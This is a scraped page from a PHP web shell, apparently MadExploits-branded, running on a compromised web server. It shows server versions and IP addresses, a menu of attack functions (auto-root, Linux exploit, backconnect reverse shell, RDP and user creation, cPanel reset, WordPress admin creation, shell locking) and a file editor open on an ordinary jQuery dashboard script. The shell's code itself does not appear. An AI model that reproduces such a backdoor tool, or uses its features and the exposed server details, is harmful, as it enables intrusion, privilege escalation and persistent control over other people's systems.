Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
finalho /
public_html /
admin /
assets /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxr-xr-x
dashboard1.js
2.72
KB
-rw-r--r--
dashboard2.js
1.84
KB
-rw-r--r--
scripts.js
1.86
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scripts.js
(function($) { "use strict"; $(function () { for (var nk = window.location, o = $(".nano-content li a").filter(function () { return this.href == nk; }) .addClass("active") .parent() .addClass("active"); ;) { if (!o.is("li")) break; o = o.parent() .addClass("d-block") .parent() .addClass("active"); } }); /* ------------------------------------------------ Sidebar open close animated humberger icon ------------------------------------------------*/ $(".hamburger").on('click', function() { $(this).toggleClass("is-active"); }); /* TO DO LIST --------------------*/ $(".tdl-new").on('keypress', function(e) { var code = (e.keyCode ? e.keyCode : e.which); if (code == 13) { var v = $(this).val(); var s = v.replace(/ +?/g, ''); if (s == "") { return false; } else { $(".tdl-content ul").append("<li><label><input type='checkbox'><i></i><span>" + v + "</span><a href='#' class='ti-close'></a></label></li>"); $(this).val(""); } } }); $(".tdl-content a").on("click", function() { var _li = $(this).parent().parent("li"); _li.addClass("remove").stop().delay(100).slideUp("fast", function() { _li.remove(); }); return false; }); // for dynamically created a tags $(".tdl-content").on('click', "a", function() { var _li = $(this).parent().parent("li"); _li.addClass("remove").stop().delay(100).slideUp("fast", function() { _li.remove(); }); return false; }); })(jQuery);
Close